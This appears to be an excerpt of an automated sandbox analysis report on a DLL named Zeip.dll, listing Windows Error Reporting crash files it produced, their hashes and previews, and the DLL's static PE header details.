              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.0.1.7.1.4.2.7.4.2.6.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.0.1.7.1.4.3.3.0.5.1.7.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.c.c.2.6.b.f.-.b.0.f.0.-.4.8.5.8.-.a.5.9.c.-.8.0.8.e.0.3.6.b.a.6.7.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.d.6.9.4.b.c.-.4.b.1.7.-.4.3.4.4.-.9.1.2.5.-.3.2.d.2.8.4.4.b.c.f.5.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.b.c.-.0.0.0.1.-.0.0.1.a.-.8.3.a.d.-.5.6.5.4.c.1.2.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_c25842a9472deba42771ef49e91222e38b3565_fe4ae974_10792659\Report.wer

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7541910840269821
              Encrypted:false
              SSDEEP:96:pLq5pyJy9hylKgPSZpXIQcQGc6McE+cw3/7+a+z+HbHgMiuuvZGxzz8sv5o5oPoK:zeHoIE/jpq/u7ssS274Itb
              MD5:335D1D0C11BECDC67416890E4A7A5040
              SHA1:972DBF92D1F34A3A65BC224D3F6421730A6C4214
              SHA-256:4C5EACACF3EF686FF3F324363763E4CB4277B7E59AD93A6AE983EA85A3463D82
              SHA-512:EC22CCFA17E7375C2EF159D4D9B8818236E44A89C7C148015E7CA527862EE68A275B175C819CE66FABF64C78A9DA539CF8F90BF67114A24341C2605C16169B9F
              Malicious:false
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.0.1.7.1.3.8.7.5.7.6.9.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.5.7.c.b.c.a.-.9.f.a.4.-.4.3.8.5.-.8.0.c.2.-.2.e.4.a.b.9.0.a.4.5.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.f.4.b.1.6.9.-.4.d.e.b.-.4.b.a.a.-.9.0.f.d.-.0.8.f.9.2.c.9.2.5.7.8.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.b.c.-.0.0.0.1.-.0.0.1.a.-.8.3.a.d.-.5.6.5.4.c.1.2.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.1.0././.0.3.:.0.5.:.5.0.:.2.8.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_f252adf21e413b1ebf932815a60fb9b4062fe9_fe4ae974_12ad3184\Report.wer

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7613316410520359
              Encrypted:false
              SSDEEP:96:MnVFR5pyCy9hyoB7JnspXIQcQGc6McE+cw3/7+a+z+HbHgMiuuvZGxzz8sv5o5ok:MuMHoIE/jpq/u7ssS274ItW
              MD5:C8EB5C5D0E434F426678E23C81C162EF
              SHA1:41E262A03A384AEC1F74D228AC876FB51DD80325
              SHA-256:3EB69586EE775D64197C0CCE033FCB396232483DC21D8FD0804BF75D81133EC6
              SHA-512:DBA15A6731F4DCA683336E8A2DC87BA498CA3A2F41CA320875D28C1F1119378BC2CDA0EC13743D23E76163ED55679082A57FAB56B197953E3FC18C50862BF862
              Malicious:false
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.0.1.7.1.4.0.0.1.7.1.7.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.0.1.7.1.4.0.5.1.7.1.6.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.8.c.0.6.1.6.-.a.a.c.f.-.4.b.c.0.-.8.3.d.5.-.c.0.4.8.e.a.d.d.2.4.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.d.e.1.e.5.9.-.3.7.5.8.-.4.a.f.a.-.a.a.9.6.-.1.a.2.a.f.d.d.4.0.7.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.b.c.-.0.0.0.1.-.0.0.1.a.-.8.3.a.d.-.5.6.5.4.c.1.2.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2407.tmp.dmp

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 15 streams, Tue Jan 24 06:58:59 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):39646
              Entropy (8bit):2.0402991444558083
              Encrypted:false
              SSDEEP:192:CMjhzvWRArPOSmo9d2+T7fuXD9ClIU9gKBmQke:3zeRJSmo94+Ta8lIU9Dz
              MD5:AA3E2254F9E04D9F0A0B52CFCA5BE45B
              SHA1:2DFD97AE1D3122D0D44BE7E6B937643842A4E242
              SHA-256:4FBA5A1B252EDCB00EE0400015C07B1D4C19AE8940A81549F98A5032A7C948D7
              SHA-512:D6FBB40A1F915F47D31893AB5BF0AF50B07D521190409D2E755490F3806D1A380F432F3EBD05E2AC722F7C3D105141A21426A52CA8266E07CD89307D942A11D2
              Malicious:false
              Preview:MDMP....... ..........c........................$...........$...............z"..........`.......8...........T...........................................................................................................U...........B......t.......GenuineIntelW...........T..............c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2531.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8344
              Entropy (8bit):3.6877670581346798
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNicHd6Lv/6Yq5SU3ygmfUSpCpNZ89bZ11f1Tm:RrlsNiW6L6Y0SU3ygmfUSpZXfc
              MD5:08FE077F7CD06175FD8D59D6084B534F
              SHA1:EFA8ABD10E47C087CCF86779E3D6B3E7DBEE87C1
              SHA-256:690F95AEE644C19B0343513E5E27F46D89B1301B9AC981AE1AB8DE0D4C4FD0FD
              SHA-512:B46737B104EC653E663277A9405FDDC0E5F3FD2E0931E371A7A2DDC2E0247DC184430AC5C5F5D1BE7E6786AE14CCD07AB24770ADADC33494E8935CFFB0B7A954
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.0.8.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER259F.tmp.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4653
              Entropy (8bit):4.411781595946208
              Encrypted:false
              SSDEEP:48:cvIwSD8zsxJgtWI9LDWgc8sqYjZ8fm8M4Jt+mF9A+q8vv+miKcQIcQwjGd:uITfD8ygrsqYKJUIAKGXKkwjGd
              MD5:CBF18C7838F406B41934F53E244BAC45
              SHA1:B5D832506B2F022E7EF33E3E1BE8ACEB8208B773
              SHA-256:06BAF2B6D26773B9C1358A13DD976860CA11CFC235907D1D7FA28657B5192D50
              SHA-512:ECB482C8971563C10C9BD9C801BCE55DF029B3DAF2038A210E21615E4A4DEA09D4B70B953D7BC18EC5F09D0489D1A5991FFFDE5A3F4CB5A3DA75260A9FC26DB1
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1881609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER28E9.tmp.dmp

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 15 streams, Tue Jan 24 06:59:00 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):39446
              Entropy (8bit):2.0001794492615557
              Encrypted:false
              SSDEEP:192:pEehzvHmOS4sR4+T7fuXr9C6IoWs1GvQw70ux/+v1:3zvxS4s++TaE6IoWs6x/0
              MD5:EFF13FBD3D5598177E874D2ADF5905AC
              SHA1:1FC1FF62610E11CBF7D21AA4EF78813B56A8CC41
              SHA-256:81B085E32192468DEA5DA1062273E20567B84395F787A878B2D0D6B4A0857295
              SHA-512:D39B54B8DB5162DDF20C305887966DF8E2488624064539DBD239357460AE5C8CCC873BBA96A53AC7B7FACE60FBE36EDB09EBEC1EB398A96E0CB78371C8DFC23D
              Malicious:false
              Preview:MDMP....... ..........c........................$...........$...............z"..........`.......8...........T............................................................................................................U...........B......t.......GenuineIntelW...........T..............c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER29E4.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8326
              Entropy (8bit):3.6963447330346777
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNicq6yv/6Yq5SUTHgmf5SpCprP89bMFsf3km:RrlsNiR666YUSUTHgmf5SJMefh
              MD5:7D63ED60935FDE152E0F13F431CE0DAA
              SHA1:2FB964EAB8D2C0DB08A0EBAE5982FB1ED84E3469
              SHA-256:5B861D9892BF3189DF00A133935A1C3FB7943621FDABD9A6797BA6FC9BA6574F
              SHA-512:0411643250DB5D16D3E15D2884513F4B1ACD4FBB162CC1AAA0F54744DA9EC1FDAE6D8CE7096D94988989D6995691A9E78DF139D59757AEC5260C4045888DBFA8
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.0.8.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A52.tmp.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4598
              Entropy (8bit):4.465107619403331
              Encrypted:false
              SSDEEP:48:cvIwSD8zsxJgtWI9LDWgc8sqYjv8fm8M4JtUvZFo+q8G5vNiKcQIcQwjXd:uITfD8ygrsqYIJyEr0KkwjXd
              MD5:ABD373A5DEF773B60C5BCAF80D6F69FF
              SHA1:FFA9CF3F23812D0A5F3137AC8BBB9307225C11D5
              SHA-256:6A20B8B77FA32540CF459013ECE2304F89FAFE07E8B63D8E4435EC465F2D88EF
              SHA-512:18CAD9E576F0334AAB80997E8AEF9C4892DA9598807E369559EF11F2AE0B41EEA23AE44306747393A340E57474C65623F8CD823980B7C724567821185A95B00C
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1881609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3397.tmp.dmp

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 15 streams, Tue Jan 24 06:59:03 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):36000
              Entropy (8bit):1.8766980093108196
              Encrypted:false
              SSDEEP:192:O5mhzvOh4LOSDHlT7fuXE9CFIoKCdoL1H:Bz2hSDFTa5FIQSR
              MD5:21AFA7FD906F2A966A04416F7190ECAA
              SHA1:E5A86224C4EBD7F973258ACB9E5C4CD1FE70A052
              SHA-256:9E080CC34852C9D855A8D845FEBC08871409713835FCB154C6533850AE73B50D
              SHA-512:9EEC373CDF472CE78580EF1431D40B4E590ADEB37BED7B4868B887C3C413DD46128938F6F0DC8EC66266A76BFF08436C0BEA05C611FB46C268F33F6772D92A37
              Malicious:false
              Preview:MDMP....... ..........c........................$...........$...............z"..........`.......8...........T................x...........................................................................................U...........B......t.......GenuineIntelW...........T..............c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3500.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8288
              Entropy (8bit):3.6889555382235533
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNicx6Cv/6YqOSUKngmfvSAUCpDX89bHFsfHNm:RrlsNi66K6YjSUKngmfvSjHefw
              MD5:0C74638520524DE44517925E3F14BD21
              SHA1:E18E274B7FCBB84D602E94890F32A9DEB6B28BCB
              SHA-256:1BF460052C143789DDD8B970224771E3A66982DB60DF38984E1BF2A86DA1FDBF
              SHA-512:EAA8D3E26D1F3AF9C768D7C9EE56769A9AFEAD5223593DCBFB03D0FC76711A61C18A6A03D4DE50F3F4E10C56ED3FDD6F00E6FA4C7BB040A3868910DE780F6A44
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.0.8.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER355E.tmp.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4552
              Entropy (8bit):4.424042589989302
              Encrypted:false
              SSDEEP:48:cvIwSD8zsxJgtWI9LDWgc8sqYj68fm8M4Jt+xFZU+q8A8WiKcQIcQwjXd:uITfD8ygrsqYrJUFUNGKkwjXd
              MD5:93064CCD96A6FDFC551E954BE9FF3F93
              SHA1:EE64CB2FC71A4BAD12FED1929619BC54C32EA904
              SHA-256:418E32F5390ED5ACCE3269A37E97E48BA7457912C759224E060B6EE51C35C50E
              SHA-512:1D51E53CA5D6B405E5A8FE0FBA6CA7AEB2539B3B1D805535F654D04855F66A2ECF79789EA643070AAE4E10F3C4369D706E5D997C827DDEC527B9C97CF0D5C03F
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1881609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

              Static File Info

              General

              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.731958095858292
              TrID:
              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
              • Generic Win/DOS Executable (2004/3) 0.20%
              • DOS Executable Generic (2002/1) 0.20%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Zeip.dll
              File size:606208
              MD5:85fa54c2a97ad3a1f8bd64af62450511
              SHA1:db92c0a81e8b27d222607e093ccc9d00485db119
              SHA256:e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35
              SHA512:6c6faba5f566e3c383d676c736319a7a70138070b0d9771727a1c7756718a4add05db8a7c3a5b038b9269a0ecb14434872516912faea8e2479729a192f9a4b4b
              SSDEEP:12288:cysmuJC4fktsdyjJGL44Clz8JwsWydYo9NRl:cT7IoyjXTKdlnz
              TLSH:52D41269D55748F3CBB112B2C0CEBE763EA1AD951B063ACF3847D4825985CD07EB6B02
              File Content Preview:MZ......................@...................................X...H...........................+....RY.........l...+.X.....................+.Y.....c................RX.....c...........l.......)...+...............).I.T...b.......).K.@.....w.........$.....v....

              File Icon

              Icon Hash:74f0e4ecccdce0e4

              Static PE Info

              General

              Entrypoint:0x401023
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x63CD3550 [Sun Jan 22 13:08:32 2023 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:78b4b07ec49eab1076c53a1a1cf86078

              Entrypoint Preview

              Instruction
              jmp 00007F92D0EEA01Dh
              jmp 00007F92D0EE9E78h
              jmp 00007F92D0EEC473h
              jmp 00007F92D0EF989Eh
              jmp 00007F92D0EEB2B9h
              jmp 00007F92D0EF0984h
              jmp 00007F92D0EF978Fh
              jmp 00007F92D0EFA8FAh
              jmp 00007F92D0EE9E25h
              jmp 00007F92D0EFB960h
              jmp 00007F92D0EF601Bh
              jmp 00007F92D0EF2A06h
              jmp 00007F92D0EEF921h
              jmp 00007F92D0EEB1DCh
              jmp 00007F92D0EF1987h
              jmp 00007F92D0EED5C2h
              jmp 00007F92D0EEA01Dh
              jmp 00007F92D0EEE688h
              jmp 00007F92D0EE9C43h
              jmp 00007F92D0EF3ACEh
              jmp 00007F92D0EF8449h
              jmp 00007F92D0EF97A4h
              jmp 00007F92D0EF4C6Fh
              jmp 00007F92D0EF827Ah
              jmp 00007F92D0EFBA25h
              jmp 00007F92D0EEE680h
              jmp 00007F92D0EF4BEBh
              jmp 00007F92D0EFCA76h
              jmp 00007F92D0EF4E61h
              jmp 00007F92D0EED60Ch
              jmp 00007F92D0EF3A47h
              jmp 00007F92D0EEF822h
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x920000xa0.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x930000x643.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000x1060.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x140000x1c.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x9220c0x16c.idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

